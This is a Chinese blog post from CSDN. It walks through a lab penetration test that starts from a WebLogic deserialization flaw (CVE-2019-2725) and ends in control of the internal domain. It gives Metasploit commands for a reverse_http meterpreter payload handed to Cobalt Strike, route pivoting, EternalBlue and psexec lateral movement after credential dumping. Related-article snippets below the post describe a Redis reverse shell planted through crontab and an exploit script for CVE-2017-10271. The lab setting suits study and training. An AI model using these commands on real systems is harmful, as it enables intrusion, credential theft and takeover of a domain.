一次从weblogic漏洞到内网渗透。

最新推荐文章于 2024-05-10 14:14:07 发布
最新推荐文章于 2024-05-10 14:14:07 发布
阅读量1.5k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/127308617
版权

靶机地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
搭建环境我就不在这里说了。

信息收集:

80端口网站什么也没有

 

 7001端口存在三个weblogic的历史漏洞

msf拿shell

search CVE-2019-2725
use 0
show options

然后设置后参数

将shell传给cs

cs设置监听

msf配置:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set IP
set PORT
run

 cs上线

 内网信息收集

查看域名

 查看域内用户

 查看域管理员

查看域下其他用户的用户名

net group "domain computers" /domain

查看域控用户名

 得到内网主机IP

 回到msf进行后渗透

添加路由表

 run autoroute -s 10.10.10.0/24
并且在看一下内网主机的IP

设置代理,横向移动 

修改配置文件

vi proxychains.conf  

 

用msf内置的扫描模块去扫描

 

 我只扫一些关键敏感的端口了

存在445和135端口开放

果断尝试永恒之蓝漏洞

执行命令成功。

但是用其他的ms17-010模块去打时,拿shell试了几次都出错了。

之后回到cs利用抓取明文账号密码,抓取到DC和PC登陆过web服务器,然后利用psexec横向到域控DC主机。

 

一个番茄锅
关注
Apache Shiro 反序列化漏洞实战
BaCde's Blog
03-22 2139
目录漏洞原理检测与利用目标发现与寻找漏洞检测利用方式修复建议参考链接 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞。尽管该漏洞已经曝光几年,但是在实战中仍然比较实用。花了点时间研究了下,并根据网络上的利用脚本改进。主要修改了检测方式,并使利用方式更加简单灵活,使其更具有实战意义,提升其效率。 漏洞原理...
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 3766
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
漏洞靶场实战-红队靶场从外网 Weblogic 打进内网,再到约束委派接管域控
Love&Share
05-09 3563
文章目录环境搭建1.外网打点2.上线 CS3.内网横向信息收集存活探测&漏洞扫描搭建代理ms17010抓密码4.二层内网域渗透win7上线cs内网信息收集二层Frp代理打数据服务器SQL server上线CS5.域内委派拿域控 从外网 Weblogic 打进内网,再到约束委派接管域控 靶场来自渗透攻击红队,官方 wp 及下载地址:https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ 本靶场存在的漏洞: GPP:admin:admin!@#45 存在 G.
linux安装weblogic_Vulhub靶机实现weblogic反序列化漏洞与内网穿透
weixin_39953356的博客
12-04 505
黑白之道首发,原标题:Vulhub搭建weblogic反序列化漏洞实现内网穿透接着上篇文章https://www.77169.net/html/265941.htmlUbuntu 192.168.50.157Kali linux 192.168.50.53当拿到weblogic 服务器后需要对内网的某些端口转发到公网进行各种花式操作,此次我们转发的是22端口。登陆到Ubuntuservi...
Weblogic 常规渗透测试环境(文件读取漏洞
EC_Carrot的博客
08-21 759
简介 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 弱口令: weblogic Oracle@123 复现操作 接下来我们假设不知道弱口令,那我们怎么靠文件读取来getshell呢? 本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成
渗透测试系列:weblogic文件路径确认(cve-2020-14882)
weixin_54626591的博客
01-12 1135
weblogic文件路径确认(cve-2020-14882)
内网渗透-weblogic中间件系列漏洞
爱上卿的博客
01-25 2210
weblogic WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。   (1)WebLogic...
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web...
内网渗透思路.pdf
04-22
在网络安全领域,尤其是渗透测试过程中,内网渗透是一项至关重要的技能。对于那些能够访问内网服务器网段的人来说,掌握有效的内网渗透策略可以帮助他们更好地识别潜在的安全威胁与弱点。本文档《内网渗透思路》旨在...
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2648
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
内网渗透靶场02----Weblogic反序列化+域渗透
jklove9的博客
02-08 1219
由于目前获取的机器是Administrator权限,因此可以直接运行getsystem获取机器的system权限,到目前为止,机器192.168.111.80机器完全被控制。通过访问weblogic登录页面可知,weblogic目前的版本是10.3.6.0,上网搜索当前weblogic版本历史上爆出过哪些漏洞?只能通过192.168.111.80开放80,7001端口进行入手。直接访问80端口发现没什么可以利用的点。7001通常是weblogic的默认端口,直接访问weblogic默认登录界面,
搭建WebLogic12.2.1.3.0(CVE_2018_2894 漏洞)的靶机
qq_44262210的博客
05-08 1394
安装配置JDK环境变量,安装配置WebLogic12,开放7001端口
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
huangyongkang666的博客
07-25 657
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)
vulnstack-2(MSF横向渗透)
weixin_54855337的博客
03-12 405
这里有个问题就是,一开始死活上线不了,关闭了防火墙,然后退出了360,一直上不了,然后重启没有退出360,执行exp,360弹窗手动选择允许,即成功上线。直接使用模块打,这里payload需要选择正向连接,反向连接shell回不来,这个正向连接shell的流量是走了frp隧道过去的。还有一种就是利用psexec进行横向,利用跳板机结合mimikatz读取域内账户的凭证,这里为了方便直接使用CS获取的。如果没打通的话,多尝试几次,可能存在网络延迟。
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1767
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
渗透实战:内网域渗透_内网渗透实例
最新发布
2201_75735270的博客
05-10 854
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
weblogic_CVE-2019-2725
Longwaer
01-16 1474
通过笔记学习Weblogic漏洞原理,快速掌握复现技巧。
一次简单的内网靶场渗透
weixin_46330465的博客
02-19 1555
本套靶场来源于渗透攻击红队。大佬勿喷,请多多指教。
weblogic漏洞
08-13
WebLogic漏洞是指Oracle公司的WebLogic Server产品中存在的安全漏洞WebLogic Server是一款用于构建企业级Java应用程序的应用服务器。 过去几年中,WebLogic Server曾多次发现严重的安全漏洞,这些漏洞可能被攻击者利用来执行恶意代码、远程命令执行、拒绝服务攻击等。其中最著名的漏洞是CVE-2019-2725和CVE-2020-2555,它们都允许攻击者远程执行任意代码。 为了保护WebLogic Server免受漏洞攻击,建议管理员及时更新和升级WebLogic Server版本,并且遵循安全最佳实践,如禁用不必要的组件、限制访问权限、使用强密码、监控日志等。此外,Oracle公司也会发布补丁程序来修复已知的漏洞,管理员应及时应用这些补丁。 如果您担心您的WebLogic Server是否受到漏洞的影响,建议您参考Oracle官方网站或与您的系统管理员联系,以获取最新的安全建议和补丁信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值